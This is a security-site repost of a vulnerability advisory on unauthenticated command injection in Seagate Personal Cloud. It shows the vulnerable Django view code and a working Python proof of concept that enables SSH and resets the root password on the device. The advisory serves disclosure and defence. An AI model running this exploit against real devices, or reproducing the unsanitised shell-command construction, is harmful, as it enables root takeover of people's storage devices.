首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Seagate Personal Cloud - Multiple Vulnerabilities
来源:http://www.securiteam.com/ 作者:SecuriTeam 发布时间:2018-01-17  
# SSD Advisory – Seagate Personal Cloud Multiple Vulnerabilities
 
## Vulnerabilities summary
The following advisory describes two (2) unauthenticated command injection vulnerabilities.
 
Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.”
 
## Credit
An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
 
## Vendor response
Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory
 
## Vulnerabilities details
Seagate Media Server uses Django web framework and is mapped to the .psp extension.
 
Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.
/etc/lighttpd/conf.d/django-host.conf:
 
 
```
fastcgi.server += (
".psp"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   )),
".psp/"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   ))
)
```
 
 
URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py.
 
Two views were found to be affected by unauthenticated command injection.
 
The affected views are:
 
- uploadTelemetry
- getLogs
 
These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module.
 
This allows an attacker to inject arbitrary system commands, that will be executed with root privileges.
 
/usr/lib/django_host/seagate_media_server/views.py:
 
 
```
@csrf_exempt
def uploadTelemetry(request):
   ts = request.GET.get('TimeStamp','')
   if (checkDBSQLite()) :
      response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
   else :
      if ts == "":
         response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
         return HttpResponse(response);
      cmd = "/usr/local/bin/log_telemetry "+str(ts)
      commands.getoutput(cmd)
   return HttpResponse('{"stat":"ok"}')
```
 
 
/usr/lib/django_host/seagate_media_server/views.py:
 
 
```
@csrf_exempt
def getLogs (request):
   try:
      cmd_base='/usr/bin/log-extract-manager.sh'
      uID = request.GET.get ( 'arch_id', None )
      time_stamp = request.GET.get ( 'time_stamp', '' )
   
      if uID:
         (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
         if ('In progress' in output) and (uID in output) :
            return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
         elif (status == 0) :
            return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
         else :
            return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
      else:
         (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
         if (status == 0) :
            return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
   
      return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
   except :
      return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
```
 
 
Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.
 
### Proof of Concept
The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.
 
 
```
#!/usr/bin/env python
import os
import urllib
   
scheme = 'http'
host = 'personalcloud.local'
port = '80'
path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'
#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'
password = 'Welcome01'
   
cmds = ['ngc --start sshd 2>&1',
      'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
   
for cmd in cmds:
   print 'Running command', repr(cmd)
   cmd = urllib.quote_plus(cmd)
   r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
   print r.read()
   
print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)
```
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DNS-325 ShareCenter 1.0
·Microsoft Edge Chakra JIT - In
·Synology Photo Station 6.8.2-3
·Microsoft Edge Chakra - 'Javas
·OBS studio 20.1.3 - Local Buff
·Microsoft Edge Chakra - Incorr
·Adminer 4.3.1 - Server-Side Re
·Microsoft Edge Chakra - Deferr
·Disk Pulse Enterprise 10.1.18
·Microsoft Edge Chakra JIT - Ou
·SysGauge Server 3.6.18 - Buffe
·Microsoft Edge Chakra - 'AsmJS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved